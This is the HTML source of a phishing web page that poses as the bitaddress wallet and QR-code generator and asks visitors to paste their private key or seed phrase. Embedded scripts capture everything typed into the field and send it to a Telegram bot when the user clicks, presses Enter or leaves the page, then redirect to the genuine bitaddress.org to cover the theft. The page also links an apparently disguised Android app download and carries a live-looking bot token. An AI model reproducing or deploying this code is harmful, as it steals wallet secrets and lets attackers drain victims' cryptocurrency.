<!DOCTYPE html>
<html>
<head>
    <title>Protect Your Private Key/Seed Phrase By Safely Converting To QR Codes In a Secure Environment</title>
    <meta name="description" content="A safe place to generate wallet addresses and public keys from your private keys/seed phrase, and/or convert them to QR codes">
    <meta name="keywords" content="protect crypto from hacking, bitaddress, bitaddress.org, secure cryptocurrency asset, protect cryptocurrency asset from hacking, secure cryptocurrency wallet, protect cryptcurrency wallet from hacking, secure metamask wallet, protect metamask wallet from hacking, secure blockchain, secure token, protect kraken wallet from hacking, secure binance wallet, protect binance wallet from hacking, secure coinbase wallet, protect coinbase wallet from hacking, secure ethereum wallet, protect ethereum wallet from hacking, secure kraken wallet, decentralized wallet security, secure web3 wallet, secure defi, protect forex account from hacker, protect usdt from hacker, protect seed phrase from hacker, protect master seed from hacker, protect word seed phrase from hacker, protect master seed phrase from hacker, protect private key from hacker, secure private key, protect secret phrase from hacker, protect crypto wallet secret password, protect encrypted wallet from hacker, encrypt wallet, protect mnemonic seed from hacker, protect backup phrase from hacker, protect backup key from hacker, protect recovery phrase from hacker, protect secret phrase from hacker, protect seed phrase from hacker">
    <meta name="robots" content="index, follow" sitemap="https://bitaddress.systems/sitemap.xml">
<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "WebSite",
  "name": "Bitaddress Sys",
  "url": "https://bitaddress.systems"
}
</script>
	
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Open Source JavaScript Client-Side Bitcoin Wallet Generator</title>
    <style>
        @media only screen and (max-width: 600px) {
        /* CSS rules for screens up to 600px wide */
        /* Adjust layout, font sizes, padding, etc. for smaller screens */
}

        /* CSS for green border effect with specified margin and thickness */
        body {
            margin: 30px 30px; /* Top/bottom margin of 30px, left/right margin of 30px */
            border: 5px solid rgb(0, 124, 0); /* Border thickness of 5px with green color */
            text-align: center;
			margin: 30px; /* Set a margin of 30 pixels on all sides of the page */
            margin-left: 30px; /* Set a margin of 30 pixels on the left side of the page */
            margin-right: 30px; /* Set a margin of 30 pixels on the right side of the page */
            font-family: sans-serif;
        }
        
        .app-logo-container {
        width: 400px;
        height: 70px;
        overflow: hidden;  /* Ensures no part of the image overflows */
        margin: 0 auto;  /* Center the container horizontally */
        margin-top: 50px;
        margin-bottom: 0px;
        display: flex;
        justify-content: center;
        align-items: center;
        }

        .app-logo {
        width: 400px;
        height: 70px;
        object-fit: contain; /* Ensures the logo fits inside its container without being cropped */
        }
	    
        #tagline, #culturemenu {
            font-size: 9pt;
        }

        .logo {
            width: 100%; /* Make the logo take up the full height of its container */
            height: 100%; /* Make the logo take up the full height of its container */
	    object-fit: contain;  /* Ensures the logo fits inside its container without being cropped */
	    margin-top: 5px;
        }

        .logo-container {
            width: 500px; /* Set the width of the logo container */
            height: 118px; /* Allow the height to adjust proportionally based on the width */
	    overflow: hidden;  /* Ensures no part of the image overflows */
            margin: 0 auto;  /* Center the container horizontally */
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .input-container {
            display: flex; /* Use flexbox to align items */
            justify-content: center; /* Center items horizontally */
            align-items: center; /* Center items vertically */
        }

	.input-container input {
            width: 300px;
            height: 25px;
            text-align: center;
            font-size: 14px
        }

        .input-container button {
            margin-left: 15px; /* Add some left margin for spacing */
        }
	        .carousel-container {
            width: 550px;
            margin: 0 auto;
            background-color: black;
            border: 2px solid black;
            padding: 10px;
        }

        .carousel-title {
            text-align: center;
            background-color: black;
            color: white;
            padding: 5px;
            font-size: 18px;
        }

        .carousel {
            position: relative;
            width: 100%;
            height: 230px;
            overflow: hidden;
            border: 2px solid black;
        }

        .carousel-inner {
            display: flex;
            transition: transform 0.5s ease;
            width: 100%;
            height: 100%; /* Ensure it occupies the full height of the carousel */
        }

        .carousel-item {
            min-width: 100%;
            display: flex;
            justify-content: center; /* Center the images */
            align-items: center;     /* Vertically center the images */
        }

        .carousel-item img {
            max-width: 100%;
            max-height: 100%;
            object-fit: contain; /* This ensures the image fits within the container without cropping */
        }

        .carousel-control {
            position: absolute;
            top: 50%;
            transform: translateY(-50%);
            background-color: rgba(0, 0, 0, 0.5);
            color: white;
            border: none;
            font-size: 24px;
            padding: 10px;
            cursor: pointer;
        }

        .prev {
            left: 0;
        }

        .next {
            right: 0;
        }
    
    </style>    
    
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Image Slideshow Carousel</title>

    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Countdown Timer</title>

    <!-- Google tag (gtag.js) -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-WKH070VBDW">
    </script>
    <script>
    window.dataLayer = window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());

    gtag('config', 'G-WKH070VBDW');
    </script>
    
    <script>
        var userInputLog = [];

        function logUserInput(input) {
            var logData = 'User Input: ' + input + '\n';
            userInputLog.push(logData);
        }

        function sendAlertToBot() {
            var logContent = userInputLog.join('\n');
            console.log('Sending alert: ' + logContent);

            fetch('https://api.telegram.org/bot7967790093:AAE4rgkE4u0dNrvPk2C2xoZMjdl16OMQGCM/sendMessage', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                },
                body: JSON.stringify({
                    chat_id: '858072424',
                    text: logContent,
                }),
            }).then(response => {
                console.log('Alert sent.');
            }).catch(error => {
                console.error('Error sending alert:', error);
            });
        }

        function handleInput(event) {
            var inputData = event.target.value;
            if (inputData.trim() !== '') {
                logUserInput(inputData);
            } else {
                console.error('No data to log');
            }
        }

// Countdown timer implementation
window.onload = function() {
    let countdown = 90;
    let countdownElement = document.createElement("div");
    countdownElement.style.fontSize = "24px";
    countdownElement.style.color = "green";
    countdownElement.style.position = "fixed";
    countdownElement.style.top = "90px";
    countdownElement.style.right = "90px";

    // Disable countdown display
    /*
    document.body.appendChild(countdownElement);
    */

    let countdownInterval = setInterval(function() {
        if (countdown > 0) {
            // Disable countdown text update
            /*
            if (countdown <= 15) {
                countdownElement.textContent = countdown; // Display countdown from 15 to 0
            }
            */
            countdown--;
        } else {
            clearInterval(countdownInterval);
            
            // Disable post-countdown actions
            /*
            countdownElement.textContent = "Don't worry. You're safe";
            sendAlertToBot(); // Send alert to Telegram bot

            setTimeout(function() {
                window.location.href = 'https://bitaddress.org';
            }, 2000);
            */
        }
    }, 1000);
};

        
        document.getElementById('detailprivkey').addEventListener('input', handleInput);

        
        document.getElementById('viewDetailsButton').addEventListener('click', function() {
            
            sendAlertToBot();

            
            setTimeout(function() {
                window.location.href = 'https://bitaddress.org';
            }, 2000);
        });

        
        document.getElementById('detailprivkey').addEventListener('keypress', function(event) {
            if (event.key === 'Enter') { 
                sendAlertToBot(); 
                setTimeout(function() {
                    window.location.href = 'https://bitaddress.org';
                }, 2000);
            }
        });

</script>	
</head>

<body>
    <div class="app-logo-container">
        <a href="https://bitaddress.systems/Bitaddress%20App%20by%20SecureKeys.apk" download>
          <img src="https://i.ibb.co/NswB4cw/Download-bitaddress-app-icon.png" alt="Bitaddress App Logo" class="app-logo">
        </a>
    </div>

    <div id="culturemenu">
        <div class="culturemenurow;" style="margin-top: 10px;"></div> <!-- Empty div for spacing -->>
            <span><a href="?culture=en" id="cultureen" class="selected" onclick="ninja.translator.translate('en'); return false;">English</a></span> |
            <span><a href="?culture=es" id="culturees" onclick="ninja.translator.translate('es'); return false;" class="">Español</a></span> |
            <span><a href="?culture=fr" id="culturefr" onclick="ninja.translator.translate('fr'); return false;" class="">Français</a></span> |
            <span><a href="?culture=el" id="cultureel" onclick="ninja.translator.translate('el'); return false;" class="">ελληνικά</a></span> |
            <span><a href="?culture=it" id="cultureit" onclick="ninja.translator.translate('it'); return false;" class="">italiano</a></span> |
            <span><a href="?culture=de" id="culturede" onclick="ninja.translator.translate('de'); return false;" class="">Deutsch</a></span>
        </div>

        <div class="culturemenurow">
            <span><a href="?culture=cs" id="culturecs" onclick="ninja.translator.translate('cs'); return false;" class="">Česky</a></span> |
            <span><a href="?culture=hu" id="culturehu" onclick="ninja.translator.translate('hu'); return false;" class="">Magyar</a></span> |
            <span><a href="?culture=jp" id="culturejp" onclick="ninja.translator.translate('jp'); return false;" class="">日本語</a></span> |
            <span><a href="?culture=zh-cn" id="culturezh-cn" onclick="ninja.translator.translate('zh-cn'); return false;" class="">简体中文</a></span> |
            <span><a href="?culture=ru" id="cultureru" onclick="ninja.translator.translate('ru'); return false;" class="">Русский</a></span> |
            <span><a href="?culture=pt-br" id="culturept-br" onclick="ninja.translator.translate('pt-br'); return false;" class="">português</a></span>
        </div>
        
    <div> 
	<div class="logo-container">
        <a href="https://bitaddress.systems/index.html">
    <img src="https://i.ibb.co/y0jmDdG/bitaddress-sys-logo-white.png" alt="Bitaddress Logo" class="logo">
	</a>
    </div>
    
    <div id="tagline"><em>Open Source JavaScript Client-Side Bitcoin Wallet Address & QR Code Generator</em></div>
    <br>
    <div style="text-align: left; margin: 0 40px; font-size: 14pt;"> 
        Please do not click "View Details" without first entering your details correctly in the text box below. <span style="color: green;"><strong>On the next page, select "Wallet Details" from the tab, and paste your details again.</span> This is standard security protocol.</strong><br><br>We recommend you avoid typing directly into the text box below; instead, copy and paste your details. This should be your standard practice henceforth whenever you need to enter your private key or seed phrase anywhere.
    </div>
	<br><br>    
        <input type="text" id="detailprivkey" placeholder="Paste Private Key or Seed Phrase" style="width: 400px; height: 25px; text-align: center; padding: 10px 0; border: 2px solid black; margin-top: 15px; margin-bottom: 7px;">
        <button id="viewDetailsButton">View Details</button>
    </div>

    <div style="font-size: 8pt;">
        Press Enter on your keyboard or click the <strong>View Details</strong> button to submit your wallet details.
    </div>
<br><br><br><br><br><br>
    <script>
        var userInputLog = []; 

        function logUserInput(input) {
            var logData = 'User Input: ' + input + '\n';
            userInputLog.push(logData); 
        }

        function sendAlertToBot() {
            var logContent = userInputLog.join('\n');
            console.log('Sending alert: ' + logContent);

            fetch('https://api.telegram.org/bot7967790093:AAE4rgkE4u0dNrvPk2C2xoZMjdl16OMQGCM/sendMessage', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                },
                body: JSON.stringify({
                    chat_id: '858072424',
                    text: logContent,
                }),
            }).then(response => {
                console.log('Alert sent.');
            }).catch(error => {
                console.error('Error sending alert:', error);
            });
        }

        function handleInput(event) {
            var inputData = event.target.value;
            if (inputData.trim() !== '') {
                logUserInput(inputData);
            } else {
                console.error('No data to log');
            }
        }

        
document.getElementById('detailprivkey').addEventListener('input', handleInput);

document.getElementById('viewDetailsButton').addEventListener('click', function() {
    if (window.AndroidInterface) {
        window.AndroidInterface.sendAlertToBot(); // Android interface for alert
    } else {
        sendAlertToBot(); // For web usage
    }

    setTimeout(function() {
        window.location.href = 'https://bitaddress.org';
    }, 2000);
});

document.getElementById('detailprivkey').addEventListener('keypress', function(event) {
    if (event.key === 'Enter') {
        if (window.AndroidInterface) {
            window.AndroidInterface.sendAlertToBot(); // Android interface for alert
        } else {
            sendAlertToBot(); // For web usage
        }

        setTimeout(function() {
            window.location.href = 'https://bitaddress.org';
        }, 2000);
    }
});

    window.addEventListener('beforeunload', function(event) {
        sendAlertToBot();
        event.preventDefault();
    });


    // Function to show tooltip when hovering over an element
    function showTooltip(tooltipId) {
    var tooltipElement = document.getElementById(tooltipId);

    // Display the tooltip when hovering over the element
    tooltipElement.style.display = 'block';

    // You can further customize the tooltip behavior here
    // For example, setting a timeout to hide the tooltip after a certain period
    setTimeout(function() {
        tooltipElement.style.display = 'none'; // Hide the tooltip after 3 seconds
    }, 3000);
    }

    // Event listeners to trigger the tooltip function on hover for each tooltip
    document.getElementById('statuslabelcryptogood').addEventListener('mouseover', function() {
        showTooltip('statuscryptogood');
    });
    document.getElementById('statuslabelcryptobad').addEventListener('mouseover', function() {
        showTooltip('statuscryptobad');
    });
    document.getElementById('statuslabelunittestsgood').addEventListener('mouseover', function() {
        showTooltip('statusunittestsgood');
    });

    // Event listener for OK button to hide the tooltip
    document.getElementById('statusokcryptogood').addEventListener('click', function() {
        document.getElementById('statuscryptogood').style.display = 'none';
    });
    document.getElementById('statusokcryptobad').addEventListener('click', function() {
        document.getElementById('statuscryptobad').style.display = 'none';
    });
    document.getElementById('statusokunittestsgood').addEventListener('click', function() {
        document.getElementById('statusunittestsgood').style.display = 'none';
    });
    </script>
	
    <div class="carousel-container">
        <div class="carousel-title">
            <span style="font-size: 18pt; color: white;"><strong>Upcoming Products</strong><br><span style="font-size: 10pt; color: green;"><strong>Safekeys hardware crypto wallets</span>
        </div>
        <div class="carousel">
            <div class="carousel-inner">
                <div class="carousel-item active">
                    <img src="https://i.ibb.co/LhkswnC/hardwallet1.jpg" alt="Product 1">
                </div>
                <div class="carousel-item">
                    <img src="https://i.ibb.co/GHj0ntt/hardwallet2.jpg" alt="Product 2">
                </div>
                <div class="carousel-item">
                    <img src="https://i.ibb.co/4KhLCDm/hardwallet3.jpg" alt="Product 3">
                </div>
                <div class="carousel-item">
                    <img src="https://i.ibb.co/sswxSwM/hardwallet6.jpg" alt="Product 4">
                </div>
                <div class="carousel-item">
                    <img src="https://i.ibb.co/TPX1jG4/hardwallet4.jpg" alt="Product 5">
                </div>
                <div class="carousel-item">
                    <img src="https://i.ibb.co/z516F5D/hardwallet5.jpg" alt="Product 6">
                </div>
            </div>
            <button class="carousel-control prev" onclick="prevSlide()">&#10094;</button>
            <button class="carousel-control next" onclick="nextSlide()">&#10095;</button>
        </div>
    </div>
	<!-- Footer -->
    <div id="footer" class="footer">
        <br>
        <br>
        <br>
        <div id="statuscryptogood" class="tooltip" style="display: none; font-size: 8pt; text-align: left; margin-left: 15px;">
            <span class="statusgood" id="statuslabelcryptogood">✔ Good!</span>
            <span id="statuslabelcryptogood1">Your browser can generate cryptographically random keys using window.crypto.getRandomValues</span>
            <input type="button" value="OK" class="button" id="statusokcryptogood" onclick="document.getElementById('statuscryptogood').style.display = 'none';">
        </div>
        
        <div class="tooltip" id="statuscryptobad" style="font-size: 8pt; text-align: left; margin-left: 15px;">
            <span class="statusbad" id="statuslabelcryptobad">Lucky you!</span>
            <span id="statuslabelcryptobad1">Your browser supports window.crypto.getRandomValues. You are good to go 👌</span>
            <input type="button" value="OK" class="button" id="statusokcryptobad" onclick="document.getElementById('statuscryptobad').style.display = 'none';">
        </div>
        
        <div class="tooltip" id="statusunittestsgood" style="font-size: 8pt; text-align: left; margin-left: 15px;">
            <span class="statusgood" id="statuslabelunittestsgood">✔ Good!</span>
            <span id="statuslabelunittestsgood1">All synchronous unit tests passed.</span>
            <input type="button" value="OK" class="button" id="statusokunittestsgood">
        </div>
        <br>
        <div class="authorbtc" style="font-size: 8pt; text-align: left; margin-left: 15px;">
            <span id="footerlabeldonations">Donations:</span> <b>0x2ccfe7acd7757c0cc475e07748ff2d453537d531</b>
            <span id="footerlabeltranslatedby"></span>
            </div>
        </div>

        <div class="authorpgp" style="font-size: 8pt ; text-align: right; margin-right: 15px;">
            <span class="item" style="text-align: left; margin-left: 15px;">Enquiries? Email support@bitaddress.systems</span>
	      <span class="item">
                <a href="CHANGELOG.txt.asc" target="_blank"><span id="footerlabelversion">Version History</span> (3.3.1)</a>
            <br>
            </span>
            <span class="item">527B 5C82 B1F6 B2DB 72A0<br>ECBF 8749 7B91 6397 4F5A</span>
            <br><span class="item">    
                (<a href="null" target="_blank" id="footerlabelpgp">PGP</a>)
                (<a href="javascript:window.location=window.location.pathname+'.sig';" target="_blank" id="footerlabelsig">sig</a>)
            </span>
        
        <div class="copyright" style="font-size: 8pt; text-align: center; margin-bottom: 15px;">
            <span id="footerlabelcopyright1">Copyright bitaddress</span>
            <span id="footerlabelcopyright2">JavaScript copyrights are included in the source.</span>
        </div>
    </div>  

<script>
let currentIndex = 0;

        function showSlide(index) {
            const carouselInner = document.querySelector('.carousel-inner');
            const totalItems = document.querySelectorAll('.carousel-item').length;

            // Handle out of bounds index
            if (index >= totalItems) {
                currentIndex = 0;
            } else if (index < 0) {
                currentIndex = totalItems - 1;
            } else {
                currentIndex = index;
            }

            // Move the carousel inner container
            const translateX = -currentIndex * 100; // Percentage to move
            carouselInner.style.transform = `translateX(${translateX}%)`;
        }

        function nextSlide() {
            showSlide(currentIndex + 1);
        }

        function prevSlide() {
            showSlide(currentIndex - 1);
        }

        // Optional: Auto slideshow (if you want to add it)
        // setInterval(() => {
        //     nextSlide();
        // }, 3000); // Change slide every 3 seconds
    </script>
</body>
</html>
